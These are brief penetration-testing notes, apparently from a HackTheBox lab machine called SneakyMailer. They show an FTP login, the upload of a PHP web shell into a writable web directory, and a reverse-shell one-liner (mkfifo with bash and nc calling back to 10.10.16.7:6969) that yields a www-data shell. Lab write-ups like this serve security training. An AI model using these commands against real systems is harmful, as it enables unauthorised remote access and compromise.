6 :21 ftp

$ pftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:kashz): developer
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir
227 Entering Passive Mode (10,10,10,197,159,7).
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Jun 30  2020 dev
226 Directory send OK.

# can write to it
ftp> cd dev
250 Directory successfully changed.
ftp> put php/web.php web.php
local: php/web.php remote: web.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
7205 bytes sent in 0.00 secs (152.6938 MB/s)

# file loads but is deleted in few seconds.
# tried overwriting index.php => fail.

# cheap trick
ftp> put php/web.php web.php
# load the webpage
# use shell 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.7 6969 >/tmp/f
# reupload the shell and then just Execute the file

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.197] 39070
bash: cannot set terminal process group (675): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sneakymailer
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux

Last updated